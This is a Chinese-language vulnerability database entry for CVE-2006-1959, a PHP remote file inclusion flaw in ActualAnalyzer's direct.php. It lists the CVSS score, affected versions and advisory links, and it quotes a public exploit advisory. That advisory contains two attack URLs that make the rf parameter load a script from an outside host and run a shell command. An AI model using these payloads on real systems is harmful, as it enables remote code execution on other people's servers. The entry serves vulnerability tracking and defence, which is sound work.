CVE-2006-1959
CVSS7.5
发布时间 :2006-04-21 06:02:00
修订时间 :2011-03-07 21:34:41
NMCOE    

[原文]PHP remote file inclusion vulnerability in direct.php in ActualScripts ActualAnalyzer Lite 2.72 and earlier, Gold 7.63 and earlier, and Server 8.23 and earlier allows remote attackers to execute arbitrary code via a URL in the rf parameter.


[CNNVD]ActualScripts ActualAnalyzer Direct.PHP 远程文件包含漏洞 (CNNVD-200604-398)

        ActualScripts ActualAnalyzer Lite 2.72及早期版本、Gold 7.63及早期版本以及Server 8.23 及早期版本中的direct.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于rf参数中的URL执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:actualscripts:actualanalyzer:2.72::lite
cpe:/a:actualscripts:actualanalyzer:7.63:gold
cpe:/a:actualscripts:actualanalyzer:8.23::server

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1959
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1959
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-398
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1430
(UNKNOWN)  VUPEN  ADV-2006-1430
http://www.securityfocus.com/bid/17597
(UNKNOWN)  BID  17597
http://www.securityfocus.com/archive/1/archive/1/431351/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060419 [MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability
http://secunia.com/advisories/19743
(UNKNOWN)  SECUNIA  19743
http://xforce.iss.net/xforce/xfdb/25893
(UNKNOWN)  XF  actualanalyzer-direct-file-include(25893)
http://www.securityfocus.com/archive/1/archive/1/434562/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060520 ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
http://www.osvdb.org/24778
(UNKNOWN)  OSVDB  24778
http://securitytracker.com/id?1015967
(UNKNOWN)  SECTRACK  1015967
http://securityreason.com/securityalert/742
(UNKNOWN)  SREASON  742

- 漏洞信息

ActualScripts ActualAnalyzer Direct.PHP 远程文件包含漏洞
高危 输入验证
2006-04-21 00:00:00 2006-04-25 00:00:00
远程  
        ActualScripts ActualAnalyzer Lite 2.72及早期版本、Gold 7.63及早期版本以及Server 8.23 及早期版本中的direct.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于rf参数中的URL执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1767)

ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability (EDBID:1767)
php webapps
2006-05-08 Verified
0 Aesthetico
N/A [点击下载]
Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: ActualScripts
URL: http://actualscripts.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "ActualScripts, Company. All rights reserved."
-----------------------------------------------------------------

Exploitation:

/direct.php?rf=http://www.yourspace.com/yourscript.php?
/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# milw0rm.com [2006-05-08]
		

- 漏洞信息

24778
ActualAnalyzer direct.php rf Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

ActualAnalyzer contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to direct.php not properly sanitizing user input supplied to the 'rf' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-19 Unknow
2006-04-19 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站